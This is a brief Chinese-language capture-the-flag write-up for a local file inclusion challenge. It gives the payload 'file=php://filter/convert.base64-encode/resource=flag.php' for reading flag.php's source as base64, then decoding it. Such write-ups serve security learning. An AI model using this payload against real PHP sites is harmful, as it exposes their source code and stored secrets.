打开网址

 

 

 LIF本地文件包含漏洞

提示flag就在页面里，且包含flag.php

使用php伪协议

file=php://filter/convert.base64-encode/resource=flag.php

得到后base64解码